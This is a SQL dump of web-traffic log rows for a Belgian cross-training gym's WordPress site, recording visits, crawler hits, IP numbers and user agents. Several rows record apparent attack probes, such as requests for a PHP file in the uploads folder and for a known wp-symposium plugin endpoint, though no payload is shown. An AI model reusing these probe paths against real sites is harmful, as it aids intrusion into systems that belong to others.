(71656, 1494159124.237307, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71657, 1494159124.751705, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71658, 1494159125.273657, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71659, 1494159125.725116, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71660, 1494159126.190444, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71661, 1494159397.399147, 1463923807, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://l.facebook.com/l.php?u=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&h=ATOyUhybEBb3goH6eBpTy0Pld4hKCV1M2XjfjGi1cuYEojF3_gCHwdDoqWE07mCW1bx8foDQv739uMcOb1ZyaHXZQxK8W3YYg5NtsD_Sj8BrOQ', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Mobile/14E304 [FBAN/FBIOS;FBAV/75.0.0.48.61;FBBV/45926345;FBRV/0;FBDV/iPhone8,4;FBMD/iPhone;FBSN/iOS;FBSV/10.3.1;FBSS/2;FBCR/OrangeB;FBID/phone;FBLC/fr_FR;FBOP/5]'),
(71662, 1494159422.386852, 1463923807, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Mobile/14E304 [FBAN/FBIOS;FBAV/75.0.0.48.61;FBBV/45926345;FBRV/0;FBDV/iPhone8,4;FBMD/iPhone;FBSN/iOS;FBSV/10.3.1;FBSS/2;FBCR/OrangeB;FBID/phone;FBLC/fr_FR;FBOP/5]'),
(71663, 1494159577.382988, 1463923807, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Mobile/14E304 [FBAN/FBIOS;FBAV/75.0.0.48.61;FBBV/45926345;FBRV/0;FBDV/iPhone8,4;FBMD/iPhone;FBSN/iOS;FBSV/10.3.1;FBSS/2;FBCR/OrangeB;FBID/phone;FBLC/fr_FR;FBOP/5]'),
(71664, 1494159611.987798, 1463923807, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Mobile/14E304 [FBAN/FBIOS;FBAV/75.0.0.48.61;FBBV/45926345;FBRV/0;FBDV/iPhone8,4;FBMD/iPhone;FBSN/iOS;FBSV/10.3.1;FBSS/2;FBCR/OrangeB;FBID/phone;FBLC/fr_FR;FBOP/5]'),
(71665, 1494160160.051995, 1837474429, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(71666, 1494160162.504062, 1837474429, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(71667, 1494160205.803583, 1837474429, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(71668, 1494160207.192294, 1837474429, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(71669, 1494160264.128877, 1837474429, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(71670, 1494160264.350236, 2521214255, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'),
(71671, 1494160282.774221, 1837474429, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(71672, 1494160310.447625, 1837474429, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(71673, 1494160312.731128, 1837474429, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(71674, 1494160863.391981, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71675, 1494160863.974276, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71676, 1494160864.423092, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71677, 1494160864.905266, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71678, 1494160865.405848, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71679, 1494160865.877843, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71680, 1494160866.423912, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71681, 1494160867.046731, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71682, 1494160867.574968, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71683, 1494160868.072623, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71684, 1494160868.551785, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71685, 1494163664.134583, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71686, 1494163664.664278, 1375112542, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71687, 1494163665.116384, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71688, 1494163665.572198, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71689, 1494163666.103837, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71690, 1494163666.559059, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71691, 1494163667.272057, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71692, 1494163667.789561, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71693, 1494163668.368178, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71694, 1494163668.866420, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71695, 1494163669.378268, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71696, 1494167825.773136, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(71697, 1494167829.502253, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(71698, 1494168998.316932, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(71699, 1494169002.846152, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(71700, 1494169007.499919, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(71701, 1494169012.087915, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(71702, 1494169026.700984, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(71703, 1494169030.913433, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(71704, 1494169040.777364, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(71705, 1494169045.557773, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(71706, 1494169050.350311, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(71707, 1494173325.573099, 2745985804, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/logo_img.php', 'http://www.crosstrainingcenter.be/wp-content/uploads/logo_img.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(71708, 1494173898.893000, 1834517617, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(71709, 1494173900.804501, 1834517617, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'),
(71710, 1494174870.064813, 1123635120, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71711, 1494174870.647425, 1123635120, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71712, 1494177090.264805, 1375068314, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71713, 1494177433.430001, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71714, 1494177433.828293, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71715, 1494177437.802808, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71716, 1494177446.240763, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71717, 1494177451.101631, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71718, 1494177458.462547, 2297635928, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71719, 1494177462.507297, 2297635928, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71720, 1494177466.670347, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71721, 1494177470.636718, 2297635928, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71722, 1494177475.480807, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71723, 1494177479.663702, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71724, 1494177488.640947, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(71725, 1494180531.666308, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/mobile_detect.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71726, 1494180789.904136, 3024883593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(71727, 1494184348.043333, 2637637394, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71728, 1494184348.085438, 2637637394, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71729, 1494189350.297352, 2637637394, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71730, 1494190897.578591, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71731, 1494196466.602073, 3233510666, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/license.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(71732, 1494200148.648997, 100662578, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(71733, 1494200190.923662, 2945073626, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32'),
(71734, 1494200204.631926, 2945073626, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/wp-symposium/server/php/index.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32'),
(71735, 1494200206.779426, 2945073626, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32'),
(71736, 1494200207.868393, 2945073626, 0, 0, 0, 0, 0, 'http://crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32'),
(71737, 1494209986.367415, 2366158852, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(71738, 1494213400.370964, 1815808070, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(71739, 1494213403.971473, 1815808070, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(71740, 1494213408.570180, 1815808070, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(71741, 1494213419.765091, 1815808070, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(71742, 1494218664.357726, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71743, 1494220192.283234, 1123635016, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71744, 1494220193.784791, 1123635091, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71745, 1494224110.825343, 2961112076, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://pizza-tycoon.com/', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36'),
(71746, 1494225597.171226, 2989643491, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G935F/G935FXXU1BPLB Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71747, 1494225598.844601, 2989643491, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G935F/G935FXXU1BPLB Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71748, 1494225617.418702, 2989643491, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G935F/G935FXXU1BPLB Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(71749, 1494226933.380884, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71750, 1494226934.004487, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71751, 1494227521.794636, 2513062086, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(71752, 1494227553.659026, 1123635091, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71753, 1494230332.590735, 1538628281, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko)'),
(71754, 1494230333.114986, 1538628281, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12602.4.8 CFNetwork/807.2.14 Darwin/16.4.0 (x86_64)'),
(71755, 1494230333.573724, 1538628281, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12602.4.8 CFNetwork/807.2.14 Darwin/16.4.0 (x86_64)'),
(71756, 1494230333.997927, 1538628281, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12602.4.8 CFNetwork/807.2.14 Darwin/16.4.0 (x86_64)'),
(71757, 1494230334.709532, 1538628281, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12602.4.8 CFNetwork/807.2.14 Darwin/16.4.0 (x86_64)'),
(71758, 1494230335.127821, 1538628281, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12602.4.8 CFNetwork/807.2.14 Darwin/16.4.0 (x86_64)'),
(71759, 1494230335.642578, 1538628281, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12602.4.8 CFNetwork/807.2.14 Darwin/16.4.0 (x86_64)'),
(71760, 1494230336.233403, 1538628281, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(71761, 1494230336.665576, 1538628281, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12602.4.8 CFNetwork/807.2.14 Darwin/16.4.0 (x86_64)'),
(71762, 1494230337.134423, 1538628281, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12602.4.8 CFNetwork/807.2.14 Darwin/16.4.0 (x86_64)'),
(71763, 1494230337.660061, 1538628281, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12602.4.8 CFNetwork/807.2.14 Darwin/16.4.0 (x86_64)'),
(71764, 1494230338.302073, 1538628281, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12602.4.8 CFNetwork/807.2.14 Darwin/16.4.0 (x86_64)'),
(71765, 1494230338.807219, 1538628281, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12602.4.8 CFNetwork/807.2.14 Darwin/16.4.0 (x86_64)'),
(71766, 1494230339.249020, 1538628281, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12602.4.8 CFNetwork/807.2.14 Darwin/16.4.0 (x86_64)'),
(71767, 1494240098.555584, 676177754, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71768, 1494240098.556319, 676177754, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71769, 1494245642.145292, 3567661094, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.87 Safari/537.36'),
(71770, 1494245644.701477, 3567661094, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.87 Safari/537.36'),
(71771, 1494245655.672598, 3567661094, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.87 Safari/537.36'),
